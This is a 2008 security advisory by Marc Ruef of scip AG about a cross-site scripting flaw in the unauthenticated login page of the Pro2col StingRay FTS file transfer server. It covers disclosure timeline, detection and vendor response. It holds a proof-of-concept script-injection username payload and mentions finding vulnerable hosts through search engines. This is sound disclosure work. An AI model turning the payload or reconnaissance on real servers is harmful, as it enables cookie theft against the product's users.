pro2col-xss.txt

2008-09-12T00:00:00
ID PACKETSTORM:69934
Type packetstorm
Reporter Marc Ruef
Modified 2008-09-12T00:00:00

Description

                                        
                                            `Pro2col StingRay FTS login username cross site scripting  
  
scip AG Vulnerability ID 3809 (09/12/2008)  
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=3809  
  
I. INTRODUCTION  
  
StingRay FTS is a file transfer server for Internet communications.  
Customers are able to transfer files or to send emails via the device.  
  
More information is available on the official product web site at the  
following URL:  
  
http://pro2col.com/solutions/products/stingray_fts  
  
II. DESCRIPTION  
  
Marc Ruef at scip AG found an input validation error within the current  
release.  
  
The initial logon script at /login.jsp that is not protected by any  
authentication procedure can be used to run arbitrary script code within  
a cross site scripting attack. Other parts of the application might be  
affected too.  
  
--- cut ---  
  
<form name="form_login" method="post" action="verify_login.jsp">  
<input type="hidden" name="form_browser_os" value="2">  
<input type="hidden" name="form_browser_type" value="2">  
<table border="0" cellspacing="0" width="100%"  
class="loginheadertable">  
<tr>  
<td valign="center" class="loginheadertable">StingRay Login</td>  
  
</tr>  
</table>  
<img border="0" src="images/line.jpg" width="100%" height="10"></img>  
<table border="0" cellpadding="5" cellspacing="5" width="100%"  
class="stdtable">  
<tr height="25" valign="middle">  
<td width="15%">Benutzername</td>  
<td width="35%"><input type="text" name="form_username"  
size="30"></td>  
<td width="50%"> </td>  
  
</tr>  
<tr height="15" valign="middle">  
<td>Passwort</td>  
<td>  
<input type="password" name="form_password" size="30">  
</td>  
<td> </td>  
</tr>  
  
</table>  
<img border="0" src="images/line.jpg" width="100%" height="10">  
<table border="0" cellpadding="5" cellspacing="5" width="100%"  
class="stdtable">  
<tr>  
<td width="50%" align="right">  
<input type="Image" src="images/bt_login_de.gif" name="login"  
class="formbutton"  
onClick="SetBrowserParam(this.form);">  
</td>  
<td> </td>  
</tr>  
  
</table>  
</form>  
  
--- cut ---  
  
III. EXPLOITATION  
  
Classic script injection techniques and unexpected input data within a  
browser session can be used to exploit this vulnerabilities.  
  
The approach to verify an insecure installation is possible with a  
simple form input. Use the following string as user name and a wrong  
passwort for the proof-of-concept:  
  
<script>alert('scip');</script>  
  
The script injection happens in this line (between the H3 headers) in  
the file /verify_login.jsp:  
  
<H3>Der Benutzer <script>alert('scip');</script> konnte nicht in der  
Datenbank gefunden werden.<br><br>Bitte wiederholen...</H3>  
  
The detection of vulnerable hosts is possible via Google hacking too as  
like Johnny Long has documented in his web database[1]. httprecon  
supports web fingerprinting for such devices too[2]. A plugin for our  
open-source exploiting framework Attack Tool Kit (ATK) will be published  
in the future[3].  
  
IV. IMPACT  
  
Because non-authenticated parts of the software are affected, this  
vulnerability is serious for every secure environment. Non-authenticated  
users might be able to exploit this flaw to gain elevated privileges  
(e.g. extracting sensitive cookie information or launch a buffer  
overflow attack against another web browser). However, as Robert Welz  
with Pro2col told my via email, the discussed login part should be  
available on the internal interface only.  
  
Because other parts of the application might be affected too - this  
could include some second order vulnerabilities - a severe attack  
scenario might be possible.  
  
V. DETECTION  
  
Detection of web based attacks requires a specialized web proxy and/or  
intrusion detection system. Patterns for such a detection are available  
and easy to implement. Usually the mathematical or logical symbols for  
less-than (<) and greater-than (>) are required to propose a HTML tag.  
In some cases single (') or double quotes (") are required to inject the  
code in a given HTML statement. Some implementation of security systems  
are looking for well-known attack tags as like <script> and attack  
attributes onMouseOver too. However, these are usually not capable of  
identifying highly optimized payload.  
  
VI. SOLUTION  
  
We have informed Pro2col on an early stage. They confirmed the problem  
and announced a bugfix for a release scheduled in March 2008 initially.  
A re-scheduling was proposed and no further details provided. Our last  
request stood unanswered for a long time.  
  
VII. VENDOR RESPONSE  
  
Pro2col has been informed a first time at 2008/06/12 via email at  
info-at-pro2col.com. A very kind reply by James Lewis came back a few  
hours later. Further discussion of the flaw (how to reproduce) were held  
with Robert Welz. A re-scheduling of the planned patch was proposed. Our  
last request stood unanswered for a long time.  
  
VIII. SOURCES  
  
scip AG - Security Consulting Information Process (german)  
http://www.scip.ch/  
  
scip AG Vulnerability Database (german)  
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=3809  
  
computec.ch document data base (german)  
http://www.computec.ch/download.php  
  
IX. DISCLOSURE TIMELINE  
  
2007/12/05 Identification of the vulnerability  
2007/12/06 First information to info-at-pro2col.com  
2007/12/07 Immediate reply by and further discussion with James Lewis  
2008/01/11 Technical confirmation by Robert Welz  
2008/03/18 Status report by Robert Welz  
2008/07/08 Offering for re-check of the patch by Robert Welz  
2008/07/09 Undefined re-scheduling of the patch  
2008/08/29 Last request for actual status (no reply)  
2008/09/12 Public advisory  
  
X. CREDITS  
  
The vulnerabilities were discovered by Marc Ruef.  
  
Marc Ruef, scip AG, Zuerich, Switzerland  
maru-at-scip.ch  
http://www.scip.ch/  
  
A1. BIBLIOGRAPHY  
  
[1] http://www.computec.ch/projekte/httprecon/  
[2] http://johnny.ihackstuff.com/ghdb.php?function=detail&id=1814  
[3] http://www.computec.ch/projekte/atk/  
  
A2. LEGAL NOTICES  
  
Copyright (c) 2007-2008 scip AG, Switzerland.  
  
Permission is granted for the re-distribution of this alert. It may not  
be edited in any way without permission of scip AG.  
  
The information in the advisory is believed to be accurate at the time  
of publishing based on currently available information. There are no  
warranties with regard to this information. Neither the author nor the  
publisher accepts any liability for any direct, indirect or  
consequential loss or damage from use of or reliance on this advisory.  
`